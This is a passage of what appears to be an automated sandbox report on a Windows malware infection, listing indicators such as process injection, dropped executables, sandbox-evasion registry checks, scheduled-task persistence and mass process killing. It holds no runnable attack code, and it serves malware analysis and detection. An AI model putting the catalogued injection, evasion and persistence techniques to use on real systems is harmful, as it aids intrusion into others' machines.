set thread context of 8804 5428 mstsca.exe mstsca.exe PID 7780 set thread context of 8384 7780 mstsca.exe mstsca.exe PID 7292 set thread context of 996 7292 mstsca.exe mstsca.exe PID 4232 set thread context of 7272 4232 mstsca.exe mstsca.exe PID 9120 set thread context of 2800 9120 fcwcirj fcwcirj PID 2020 set thread context of 8600 2020 mstsca.exe mstsca.exe -
autoit_exe 4 IoCs
AutoIT scripts compiled to PE executables.
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\7zS8213C1D5\Wed09e95ff6b5.exe autoit_exe C:\Users\Admin\AppData\Local\Temp\7zS8213C1D5\Wed09e95ff6b5.exe autoit_exe C:\Users\Public\run2.exe autoit_exe C:\Users\Public\run2.exe autoit_exe -
Drops file in Program Files directory 34 IoCs
Processes:
cmd.exeWed09d27135e5a8b3b.tmpF250.exeFwHqtgaeyOSwZ8d9WMwXxCEz.exejg1_1faf.exeConhost.exemsiexec.exeNQjGc9Mv6jUsTTYs2QQ03Mk5.exeExplorer.EXEDYbALA.exedescription ioc process File opened for modification C:\Program Files (x86)\Rprqhz\tjrixg4.exe cmd.exe File opened for modification C:\Program Files (x86)\FarLabUninstaller\unins000.dat Wed09d27135e5a8b3b.tmp File opened for modification C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe F250.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\Uninstall.exe F250.exe File opened for modification C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe FwHqtgaeyOSwZ8d9WMwXxCEz.exe File created C:\Program Files (x86)\Company\NewProduct\d.jfm jg1_1faf.exe File created C:\Program Files\Common Files\VBNQPMRAFB\foldershare.exe.config Conhost.exe File created C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.exe msiexec.exe File opened for modification C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe NQjGc9Mv6jUsTTYs2QQ03Mk5.exe File created C:\Program Files\Common Files\VBNQPMRAFB\foldershare.exe Conhost.exe File created C:\Program Files (x86)\Google\Gazhovaliha.exe Conhost.exe File opened for modification C:\Program Files (x86)\Rprqhz Explorer.EXE File created C:\Program Files (x86)\Rprqhz\tjrixg4.exe Explorer.EXE File created C:\Program Files (x86)\Company\NewProduct\Uninstall.ini F250.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\d jg1_1faf.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\d.jfm jg1_1faf.exe File created C:\Program Files (x86)\Reference Assemblies\Fugaetoduwa.exe DYbALA.exe File created C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe msiexec.exe File created C:\Program Files (x86)\AW Manager\Windows Manager\Uninstall.lnk msiexec.exe File created C:\Program Files (x86)\FarLabUninstaller\unins000.dat Wed09d27135e5a8b3b.tmp File created C:\Program Files (x86)\Company\NewProduct\d jg1_1faf.exe File created C:\Program Files (x86)\Company\NewProduct\tmp.edb jg1_1faf.exe File created C:\Program Files\Uninstall Information\GHGLGAOUIE\foldershare.exe DYbALA.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\cutm3.exe F250.exe File opened for modification C:\Program Files (x86)\AW Manager\Windows Manager\EULA.url msiexec.exe File created C:\Program Files (x86)\FarLabUninstaller\is-G67V2.tmp Wed09d27135e5a8b3b.tmp File created C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe NQjGc9Mv6jUsTTYs2QQ03Mk5.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\d.INTEG.RAW jg1_1faf.exe File created C:\Program Files (x86)\Google\Gazhovaliha.exe.config Conhost.exe File created C:\Program Files\Uninstall Information\GHGLGAOUIE\foldershare.exe.config DYbALA.exe File created C:\Program Files (x86)\Reference Assemblies\Fugaetoduwa.exe.config DYbALA.exe File opened for modification C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.ini msiexec.exe File created C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe FwHqtgaeyOSwZ8d9WMwXxCEz.exe File opened for modification C:\Program Files (x86)\AW Manager\Windows Manager\Privacy.url msiexec.exe -
Drops file in Windows directory 46 IoCs
Processes:
msiexec.exeMicrosoftEdge.exeMicrosoftEdge.exeMicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exedescription ioc process File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\MSI242B.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI690D.tmp msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File opened for modification C:\Windows\Installer\MSI699B.tmp msiexec.exe File created C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\SystemFoldermsiexec.exe msiexec.exe File created C:\Windows\Installer\f7a213f.msi msiexec.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdge.exe File opened for modification C:\Windows\Installer\MSI67F2.tmp msiexec.exe File created C:\Windows\Installer\SourceHash{C845414C-903C-4218-9DE7-132AB97FDF62} msiexec.exe File opened for modification C:\Windows\Installer\MSI6C0F.tmp msiexec.exe File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe File opened for modification C:\Windows\Installer\MSI22F2.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI24DB.tmp msiexec.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdge.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdgeCP.exe File opened for modification C:\Windows\Installer\MSI6C9C.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI6D5D.tmp msiexec.exe File opened for modification C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\SystemFoldermsiexec.exe msiexec.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdgeCP.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdge.exe File opened for modification C:\Windows\Installer\MSI248B.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI6CFD.tmp msiexec.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdgeCP.exe File opened for modification C:\Windows\Installer\f7a213c.msi msiexec.exe File opened for modification C:\Windows\Installer\MSI24AB.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI24FB.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI6784.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI6870.tmp msiexec.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdgeCP.exe File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe File created C:\Windows\Installer\f7a213c.msi msiexec.exe File opened for modification C:\Windows\Installer\MSI707C.tmp msiexec.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdge.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdgeCP.exe File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe File opened for modification C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\logo.exe msiexec.exe File opened for modification C:\Windows\Installer\MSI246B.tmp msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File opened for modification C:\Windows\Installer\MSI69CB.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI6CBD.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI6CDD.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI6D1D.tmp msiexec.exe File created C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\logo.exe msiexec.exe File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdgeCP.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 13 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 3152 5016 WerFault.exe Wed09cfb2f9758281d8.exe 5268 5016 WerFault.exe Wed09cfb2f9758281d8.exe 5728 5016 WerFault.exe Wed09cfb2f9758281d8.exe 5948 5016 WerFault.exe Wed09cfb2f9758281d8.exe 5080 2848 WerFault.exe run.exe 6076 1360 WerFault.exe 10.exe 6072 1976 WerFault.exe 5.exe 2680 5088 WerFault.exe setup.exe 5632 5088 WerFault.exe setup.exe 4728 5088 WerFault.exe setup.exe 4252 5088 WerFault.exe setup.exe 6084 5016 WerFault.exe Wed09cfb2f9758281d8.exe 1496 5016 WerFault.exe Wed09cfb2f9758281d8.exe -
Checks SCSI registry key(s) 3 TTPs 32 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
D800.exeuphVV8ghcsrAKvTLycJGCo_b.execbwcirjuswcirjcbwcirjWed09b2a8bc4f16cb.exe67j94FgroPgh6JIk3aUx67IB.exeMicrosoftEdgeCP.exe9E51.exeMicrosoftEdgeCP.exedescription ioc process Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI D800.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI uphVV8ghcsrAKvTLycJGCo_b.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI uphVV8ghcsrAKvTLycJGCo_b.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI cbwcirj Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI uswcirj Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI cbwcirj Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Wed09b2a8bc4f16cb.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 67j94FgroPgh6JIk3aUx67IB.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI uswcirj Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI cbwcirj Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Wed09b2a8bc4f16cb.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000 MicrosoftEdgeCP.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\ConfigFlags MicrosoftEdgeCP.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 67j94FgroPgh6JIk3aUx67IB.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000 MicrosoftEdgeCP.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI D800.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 9E51.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI D800.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\ConfigFlags MicrosoftEdgeCP.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\ConfigFlags MicrosoftEdgeCP.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI cbwcirj Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\ConfigFlags MicrosoftEdgeCP.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI uswcirj Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI uphVV8ghcsrAKvTLycJGCo_b.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 9E51.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI cbwcirj Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 67j94FgroPgh6JIk3aUx67IB.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 9E51.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000 MicrosoftEdgeCP.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000 MicrosoftEdgeCP.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI cbwcirj Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Wed09b2a8bc4f16cb.exe -
Checks processor information in registry 2 TTPs 12 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
nmDpho0Rqwv3pDRRZHOjSsDL.exeFcV14WEg5407DrTsHvKslqZf.exeEA22.exeEEE4.exesvchost.exebuild2.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 nmDpho0Rqwv3pDRRZHOjSsDL.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString nmDpho0Rqwv3pDRRZHOjSsDL.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 FcV14WEg5407DrTsHvKslqZf.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString FcV14WEg5407DrTsHvKslqZf.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 EA22.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EA22.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 EEE4.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString build2.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 build2.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EEE4.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz svchost.exe -
Creates scheduled task(s) 1 TTPs 7 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 7688 schtasks.exe 2584 schtasks.exe 3080 schtasks.exe 1480 schtasks.exe 6284 schtasks.exe 1108 schtasks.exe 8400 schtasks.exe -
Delays execution with timeout.exe 5 IoCs
Processes:
timeout.exetimeout.exetimeout.exetimeout.exetimeout.exepid process 6240 timeout.exe 7220 timeout.exe 8028 timeout.exe 9128 timeout.exe 2456 timeout.exe -
Kills process with taskkill 15 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 2516 taskkill.exe 1252 taskkill.exe 3628 taskkill.exe 6368 taskkill.exe 5108 taskkill.exe 7760 taskkill.exe 4236 taskkill.exe 724 taskkill.exe 7180 taskkill.exe 2248 taskkill.exe 6232 taskkill.exe 6520 taskkill.exe 2916 taskkill.exe 8364 taskkill.exe 4224 taskkill.exe -
Processes:
MicrosoftEdgeCP.execmd.exebrowser_broker.exeMicrosoftEdge.exebrowser_broker.exebrowser_broker.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdgeCP.exe Key created \Registry\User\S-1-5-21-2481030822-2828258191-1606198294-1000\SOFTWARE\Microsoft\Internet Explorer\IntelliForms\Storage2 cmd.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\Main browser_broker.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\Main browser_broker.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\Main browser_broker.exe -
Modifies data under HKEY_USERS 20 IoCs
Processes:
msiexec.exesvchost.exesvchost.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17 msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" svchost.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" svchost.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16 msiexec.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit\Version = "7" svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" svchost.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E msiexec.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" svchost.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache svchost.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" svchost.exe -
Modifies registry class 64 IoCs
Processes:
MicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdge.exeMicrosoftEdge.exemsiexec.exeMicrosoftEdgeCP.exesvchost.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exerundll32.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Cookies\CacheLimit = "1" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\Root MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BingPageData MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CachePrefix = "Visited:" MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = b152ded338cbd701 MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\Meta\generator$MediaWiki MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate\Certificates MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\Total MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TabbedBrowsing\NewTabPage MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modif = 0100000061acbe22a15dd742fb055f851ad942bf71fb560f65c04bdf96ed89c2faf16924c9402a8d6a403854857dd1b57345c7cd370433bb9d425f168c2d MicrosoftEdge.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\AuthorizedLUAApp = "0" msiexec.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer MicrosoftEdge.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\PackageCode = "6BBF4B2F4524B25478C17BFBEE2559F7" msiexec.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\totalcoolblog.com\Total = "192" MicrosoftEdgeCP.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{IFW2IAU0-YI0T-SZ81-840P-PAI76YIYJF79}\650478DC7424C37C svchost.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main\OperationalData = "1" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\expensivesurvey.online\ = "91" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\totalcoolblog.com\ = "29" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\Active = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DomainSuggestion\FileNames MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\totalcoolblog.com\ = "159" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\expensivesurvey.online\ = "1067" MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\SignaturePolicy = 06000000 MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local 